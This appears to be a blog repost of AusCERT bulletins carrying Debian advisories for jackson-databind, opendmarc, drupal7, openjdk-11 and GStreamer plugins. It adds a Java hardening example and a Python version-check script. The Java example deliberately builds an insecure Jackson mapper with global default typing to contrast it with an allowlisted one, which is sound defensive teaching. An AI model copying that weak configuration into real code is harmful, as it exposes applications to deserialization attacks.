For Debian 9 stretch, these problems have been fixed in version
2.8.6-1+deb9u9.

We recommend that you upgrade your jackson-databind packages.

For the detailed security status of jackson-databind please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/jackson-databind

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----

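The "serialization gadgets and typing" entries in the jackson-databind advisory above are only reachable when Jackson polymorphic ("default") typing is active on a path that parses untrusted JSON: the type id carried in the input then names the class to instantiate, and upstream fixes for this CVE class add the newly found gadget classes to a blocklist. The block below is an added example, not code from the Debian or Jackson projects; it contrasts the weak configuration (global default typing, which resolves any class the input names) with an allowlist-based PolymorphicTypeValidator. It assumes jackson-databind 2.10 or later, where activateDefaultTyping and BasicPolymorphicTypeValidator exist (the 2.8.6 package in this advisory predates them), and the package prefix com.example.model. is a placeholder for an application's own model classes.

```java
// Added example (not Debian's or Jackson's code): weak vs. hardened
// polymorphic typing in jackson-databind 2.10+. The package prefix
// "com.example.model." is a placeholder for the application's own DTOs.
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingHardening {

    /** Weak: any class name carried in the JSON is resolved and instantiated. */
    @SuppressWarnings("deprecation")
    static ObjectMapper weakMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since 2.10: allow-everything validator
        return mapper;
    }

    /** Hardened: only subtypes under the application's own package may be named. */
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    /** True when the mapper built an instance of the class named in the input. */
    static boolean resolvesInputNamedType(ObjectMapper mapper, String json) {
        try {
            Object value = mapper.readValue(json, Object.class);
            return value != null;
        } catch (InvalidTypeIdException denied) {
            return false; // the validator refused the type id
        } catch (java.io.IOException other) {
            throw new IllegalStateException(other);
        }
    }

    public static void main(String[] args) {
        // Constructed input: with default typing active, the array form
        // ["fully.qualified.ClassName", {...}] names the class to build.
        // java.util.HashMap is harmless here; a gadget class would sit in the same slot.
        String json = "[\"java.util.HashMap\", {\"k\": \"v\"}]";
        System.out.println("weak mapper instantiates the named class: "
                + resolvesInputNamedType(weakMapper(), json));
        System.out.println("hardened mapper instantiates the named class: "
                + resolvesInputNamedType(hardenedMapper(), json));
    }
}
```

With jackson-databind on the classpath, the weak mapper builds a java.util.HashMap from the class name in the input, while the hardened mapper throws InvalidTypeIdException and the helper reports false. The durable fix is the allowlist (or leaving default typing off and using @JsonTypeInfo with named ids on specific base types), because a blocklist has to be extended for every newly discovered gadget, which is exactly the pattern this advisory's list of CVEs shows.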

ESB-2021.1398 – [Win][UNIX/Linux][Debian] opendmarc: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1398
opendmarc security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           opendmarc
Publisher:         Debian
Operating System:  Debian GNU/Linux
                   UNIX variants (UNIX, Linux, OSX)
                   Windows
Impact/Access:     Denial of Service -- Remote/Unauthenticated
                   Reduced Security  -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-12460

Original Bulletin:
   http://www.debian.org/lts/security/2021/dla-2639

Comment: This advisory references vulnerabilities in products which run on
         platforms other than Debian. It is recommended that administrators
         running opendmarc check for an updated version of the software for
         their operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2639-1                debian-lts@lists.debian.org
https://www.debian.org/lts/security/                          Utkarsh Gupta
April 25, 2021                                https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------

Package : opendmarc
Version : 1.3.2-2+deb9u3
CVE ID : CVE-2020-12460
Debian Bug : 966464

It was discovered that OpenDMARC, a milter implementation of DMARC,
has improper null termination in the function opendmarc_xml_parse that
can result in a one-byte heap overflow in opendmarc_xml when parsing a
specially crafted DMARC aggregate report. This can cause remote memory
corruption when a '\0' byte overwrites the heap metadata of the next
chunk and its PREV_INUSE flag.

For Debian 9 stretch, this problem has been fixed in version
1.3.2-2+deb9u3.

We recommend that you upgrade your opendmarc packages.

For the detailed security status of opendmarc please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/opendmarc

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----


ESB-2021.1399 – [Debian] drupal7: Cross-site scripting – Unknown/unspecified

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1399
drupal7 security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           drupal7
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Cross-site Scripting -- Unknown/Unspecified
Resolution:        Patch/Upgrade

Original Bulletin:
   http://www.debian.org/lts/security/2021/dla-2637

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2637-1                debian-lts@lists.debian.org
https://www.debian.org/lts/security/                            Gunnar Wolf
April 23, 2021                                https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------

Package : drupal7
Version : 7.52-2+deb9u15

The Drupal project identified a vulnerability in the sanitization
performed in the _filter_xss_attributes function, potentially
allowing cross-site scripting, and granted it the Drupal Security
Advisory ID SA-CORE-2021-002:

https://www.drupal.org/sa-core-2021-002

No CVE number has been announced.

For Debian 9 “Stretch”, the fix to this issue was backported in
version 7.52-2+deb9u15.

We recommend you upgrade your drupal7 package.

For detailed security status of drupal7, please refer to its security
tracker page:

https://security-tracker.debian.org/tracker/source-package/drupal7

Further information about Debian LTS security advisories, how to
apply these updates to your system, and other frequently asked
questions can be found at:

https://wiki.debian.org/LTS

- -----BEGIN PGP SIGNATURE-----

iHUEARYIAB0WIQRgswk9lhCOXLlxQu/i9jtDU/RZiQUCYIMubAAKCRDi9jtDU/RZ
iWn/AP40rhBJ+FJXOLacDMle2Sc0aLBjuP55OFhOVmWsSchm6AD+PgCg3zHyvOyj
7ZMI0BP3NiMAZAOMlXJpDIVwGINd9Qc=
=DPfS
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----


ESB-2021.1400 – [Debian] openjdk-11: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1400
openjdk-11 security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           openjdk-11
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Modify Arbitrary Files   -- Remote/Unauthenticated
                   Access Confidential Data -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2021-2161

Reference:         ASB-2021.0076
                   ESB-2021.0701

Original Bulletin:
   http://www.debian.org/security/2021/dsa-4899

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4899-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
April 23, 2021                        https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package : openjdk-11
CVE ID : CVE-2021-2161

It was discovered that the OpenJDK Java platform incompletely enforced
configuration settings used in Jar signing verifications.

For the stable distribution (buster), this problem has been fixed in
version 11.0.11+9-1~deb10u1.

We recommend that you upgrade your openjdk-11 packages.

For the detailed security status of openjdk-11 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/openjdk-11

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----


ESB-2021.1401 – [Win][UNIX/Linux][Debian] gst plugins: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1401
gst plugins security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           gst-plugins-good1.0
                   gst-libav1.0
                   gst-plugins-bad1.0
                   gst-plugins-base1.0
                   gst-plugins-ugly1.0
Publisher:         Debian
Operating System:  Debian GNU/Linux
                   UNIX variants (UNIX, Linux, OSX)
                   Windows
Impact/Access:     Execute Arbitrary Code/Commands -- Unknown/Unspecified
                   Denial of Service               -- Unknown/Unspecified
Resolution:        Patch/Upgrade
CVE Names:         CVE-2021-3498 CVE-2021-3497

Original Bulletin:
   http://www.debian.org/security/2021/dsa-4900
   http://www.debian.org/security/2021/dsa-4901
   http://www.debian.org/security/2021/dsa-4902
   http://www.debian.org/security/2021/dsa-4903
   http://www.debian.org/security/2021/dsa-4904

Comment: This bulletin contains five (5) Debian security advisories.

         This advisory references vulnerabilities in products which run on
         platforms other than Debian. It is recommended that administrators
         running gst-plugins-good1.0 check for an updated version of the
         software for their operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4900-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
April 24, 2021                        https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package : gst-plugins-good1.0
CVE ID : CVE-2021-3497 CVE-2021-3498
Debian Bug : 986910 986911

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), these problems have been fixed in
version 1.14.4-1+deb10u1.

We recommend that you upgrade your gst-plugins-good1.0 packages.

For the detailed security status of gst-plugins-good1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-good1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------------------------------------------------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4901-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
April 24, 2021                        https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package : gst-libav1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.15.0.1+git20180723+db823502-2+deb10u1.

We recommend that you upgrade your gst-libav1.0 packages.

For the detailed security status of gst-libav1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-libav1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCEWIkACgkQEMKTtsN8
Tja1wRAApaFYfJxyCR46nV/MBRUsGlShmGs9FfGhaeNC0O91RkIX/bU+HX0hsCVc
2CE2LPBDtrEFfe7O1rtOSdS6Ip0FyRuYCCYe7bx1/4AgRLkYWc/j/NklMp39UjxM
wQmKQGMNqTqD8ktuP/Kuh6ZNuCeAQg3UGXlJ+DXz9UpY9jNUTG80SxvRFo3Drbv9
KteNp98fG5KB4GFZ8T4RjWClZVEUdYBMcoa8vie9rfozR0a3EmLZA9qYHffaJA1t
OMyYEluJuol57U78jFd6A2wKsrD0XnmD6Lmf+gDQ0NdF+lNqigV2bGJ09gbP49KG
VJybMiaor9jQbxa4Cq21gofZ75rGinSRsEs8yITTBOu23r1cFR68+nRxfzzjZHhc
6OTs/LBSJiA3PuDTNbRZQ17dpQp1KfgVQ51KzYtuD9dhSNUG3ZRBDK4MX/gcQOA1
jX442mpIUxf2la3J1wadIeHeTb6XixvIsUN58l07LA8HEY+ElxS+xd/x/AXyN4Fu
MF/AqjSP6lKn64eLBsNsOQmo2oHEH17tCZhCEuRAArQtkWYZ7MnpKcp/w6iXj36N
1wkIb0ib6cEPhNemUi1AXlY9cOkt+aicmzvxNaJjwwCWnyGBoI90njzBDsavbmbY
VywLOrXW4v/y3pvUW1m8QgSJ2/tyaLKK+MgpoP6YIt7aO63fiZ0=
=cK2V
- -----END PGP SIGNATURE-----

- --------------------------------------------------------------------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4902-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
April 24, 2021                        https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package : gst-plugins-bad1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.14.4-1+deb10u2.

We recommend that you upgrade your gst-plugins-bad1.0 packages.

For the detailed security status of gst-plugins-bad1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-bad1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------------------------------------------------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4903-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
April 24, 2021                        https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package : gst-plugins-base1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.14.4-2+deb10u1.

We recommend that you upgrade your gst-plugins-base1.0 packages.

For the detailed security status of gst-plugins-base1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-base1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- ------------------------------------------------------------------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4904-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 24, 2021 https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package : gst-plugins-ugly1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.14.4-1+deb10u1.

We recommend that you upgrade your gst-plugins-ugly1.0 packages.

For the detailed security status of gst-plugins-ugly1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-ugly1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----
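The three advisories above (DSA-4902-1, DSA-4903-1 and DSA-4904-1) each name the buster version that carries the fix but leave the "is my host still affected?" check to the reader. The following is an added example and is not part of the Debian advisories or the AusCERT bulletin. It re-implements dpkg's version-ordering rules (epoch, then upstream version, then Debian revision; digit runs compare numerically, and `~` sorts before anything, including the end of the string) in pure Python so the comparison runs on a host without dpkg, and it compares a set of installed versions against the fixed versions stated in the advisories. `SAMPLE_INSTALLED` is a constructed set of installed versions used only for illustration; `installed_from_dpkg` is a helper I added that shells out to `dpkg-query` where it exists.

```python
"""Compare installed GStreamer plugin packages with the fixed versions named in
DSA-4902-1, DSA-4903-1 and DSA-4904-1 (Debian buster).

Added example, not code from Debian or AusCERT. The ordering below follows
dpkg's verrevcmp() so it matches `dpkg --compare-versions` without needing dpkg.
"""
import subprocess

# Fixed versions exactly as stated in the three advisories (buster).
FIXED_VERSIONS = {
    "gst-plugins-bad1.0": "1.14.4-1+deb10u2",   # DSA-4902-1
    "gst-plugins-base1.0": "1.14.4-2+deb10u1",  # DSA-4903-1
    "gst-plugins-ugly1.0": "1.14.4-1+deb10u1",  # DSA-4904-1
}

# Constructed sample of what a partially patched host might report.
SAMPLE_INSTALLED = {
    "gst-plugins-bad1.0": "1.14.4-1+deb10u1",   # one revision behind the fix
    "gst-plugins-base1.0": "1.14.4-2+deb10u1",  # exactly the fixed version
    "gst-plugins-ugly1.0": "1.16.2-2",          # newer upstream than the fix
}


def _order(c):
    """dpkg's character weight: digits 0, letters by code point, '~' before all."""
    if c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1
    return ord(c) + 256 if c else 0


def _char(s, i):
    """Character at index i, or '' once the string is exhausted."""
    return s[i] if i < len(s) else ""


def _verrevcmp(a, b):
    """Compare two version fragments (upstream or revision) like dpkg does."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        # Non-digit run: lexical, using dpkg's character weights.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac, bc = _order(_char(a, i)), _order(_char(b, j))
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        # Digit run: drop leading zeros, then compare as a number.
        while _char(a, i) == "0":
            i += 1
        while _char(b, j) == "0":
            j += 1
        while _char(a, i).isdigit() and _char(b, j).isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if _char(a, i).isdigit():
            return 1   # a has more digits left, so it is the larger number
        if _char(b, j).isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def parse_version(v):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in v:
        e, v = v.split(":", 1)
        epoch = int(e)
    upstream, revision = (v.rsplit("-", 1) if "-" in v else (v, ""))
    return epoch, upstream, revision


def compare_versions(a, b):
    """Return -1, 0 or 1 with the same ordering as `dpkg --compare-versions`."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    for x, y in ((ua, ub), (ra, rb)):
        r = _verrevcmp(x, y)
        if r:
            return -1 if r < 0 else 1
    return 0


def vulnerable_packages(installed):
    """Advisory packages whose installed version is older than the fixed one."""
    return sorted(pkg for pkg, fixed in FIXED_VERSIONS.items()
                  if pkg in installed and compare_versions(installed[pkg], fixed) < 0)


def installed_from_dpkg(packages):
    """Ask dpkg-query for installed versions; returns {} where dpkg is absent."""
    try:
        proc = subprocess.run(
            ["dpkg-query", "-W", "-f=${Package} ${Version} ${Status}\n", *packages],
            capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return {}
    found = {}
    for line in proc.stdout.splitlines():
        parts = line.split()           # pkg, version, "install", "ok", "installed"
        if len(parts) >= 5 and parts[-1] == "installed":
            found[parts[0]] = parts[1]
    return found


if __name__ == "__main__":
    live = installed_from_dpkg(FIXED_VERSIONS) or SAMPLE_INSTALLED
    print("still affected:", vulnerable_packages(live) or "none")
```

With the constructed sample only gst-plugins-bad1.0 is reported, because base is already at the fixed version and ugly carries a newer upstream release. The tilde rule matters for backports: a `…+deb10u2~bpo10+1` build sorts below `…+deb10u2` and is therefore still reported as affected.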

The post ESB-2021.1401 – [Win][UNIX/Linux][Debian] gst plugins: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1401-winunix-linuxdebian-gst-plugins-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1401-winunix-linuxdebian-gst-plugins-multiple-vulnerabilities

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...